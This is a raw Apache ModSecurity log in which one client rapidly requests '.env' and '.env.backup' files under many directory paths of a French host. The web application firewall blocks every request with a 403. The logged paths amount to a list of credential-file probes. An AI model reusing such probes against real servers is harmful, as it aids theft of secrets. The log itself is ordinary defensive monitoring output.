[Mon May 11 16:41:54.010237 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agHqslV4kyjgo4bQBUhaswAAAMg"]
[Mon May 11 16:41:54.010729 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agHqslV4kyjgo4bQBUhaswAAAMg"]
[Mon May 11 16:41:54.010969 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agHqslV4kyjgo4bQBUhaswAAAMg"]
[Mon May 11 16:41:54.247661 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agHqslV4kyjgo4bQBUhatAAAAMg"]
[Mon May 11 16:41:54.248130 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agHqslV4kyjgo4bQBUhatAAAAMg"]
[Mon May 11 16:41:54.248374 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agHqslV4kyjgo4bQBUhatAAAAMg"]
[Mon May 11 16:41:54.409900 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agHqslV4kyjgo4bQBUhatQAAAMg"]
[Mon May 11 16:41:54.410410 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agHqslV4kyjgo4bQBUhatQAAAMg"]
[Mon May 11 16:41:54.410624 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agHqslV4kyjgo4bQBUhatQAAAMg"]
[Mon May 11 16:41:54.573471 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agHqslV4kyjgo4bQBUhatgAAAMg"]
[Mon May 11 16:41:54.574074 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agHqslV4kyjgo4bQBUhatgAAAMg"]
[Mon May 11 16:41:54.574363 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agHqslV4kyjgo4bQBUhatgAAAMg"]
[Mon May 11 16:41:54.751390 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agHqslV4kyjgo4bQBUhatwAAAMg"]
[Mon May 11 16:41:54.751907 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agHqslV4kyjgo4bQBUhatwAAAMg"]
[Mon May 11 16:41:54.752132 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agHqslV4kyjgo4bQBUhatwAAAMg"]
[Mon May 11 16:41:54.918731 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agHqslV4kyjgo4bQBUhauAAAAMg"]
[Mon May 11 16:41:54.919275 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agHqslV4kyjgo4bQBUhauAAAAMg"]
[Mon May 11 16:41:54.919537 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agHqslV4kyjgo4bQBUhauAAAAMg"]
[Mon May 11 16:41:55.086201 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agHqs1V4kyjgo4bQBUhauQAAAMg"]
[Mon May 11 16:41:55.086721 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agHqs1V4kyjgo4bQBUhauQAAAMg"]
[Mon May 11 16:41:55.086946 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agHqs1V4kyjgo4bQBUhauQAAAMg"]
[Mon May 11 16:41:55.248659 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agHqs1V4kyjgo4bQBUhauwAAAMg"]
[Mon May 11 16:41:55.249150 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agHqs1V4kyjgo4bQBUhauwAAAMg"]
[Mon May 11 16:41:55.249405 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agHqs1V4kyjgo4bQBUhauwAAAMg"]
[Mon May 11 16:41:55.419128 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavAAAAMg"]
[Mon May 11 16:41:55.419682 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavAAAAMg"]
[Mon May 11 16:41:55.420001 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavAAAAMg"]
[Mon May 11 16:41:55.580842 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavQAAAMg"]
[Mon May 11 16:41:55.581340 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavQAAAMg"]
[Mon May 11 16:41:55.581590 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavQAAAMg"]
[Mon May 11 16:41:55.751453 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavgAAAMg"]
[Mon May 11 16:41:55.751935 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavgAAAMg"]
[Mon May 11 16:41:55.752212 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agHqs1V4kyjgo4bQBUhavgAAAMg"]
[Mon May 11 16:41:55.913621 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agHqs1V4kyjgo4bQBUhavwAAAMg"]
[Mon May 11 16:41:55.914107 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agHqs1V4kyjgo4bQBUhavwAAAMg"]
[Mon May 11 16:41:55.914377 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agHqs1V4kyjgo4bQBUhavwAAAMg"]
[Mon May 11 16:41:56.092775 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agHqtFV4kyjgo4bQBUhawAAAAMg"]
[Mon May 11 16:41:56.093271 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agHqtFV4kyjgo4bQBUhawAAAAMg"]
[Mon May 11 16:41:56.093503 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agHqtFV4kyjgo4bQBUhawAAAAMg"]
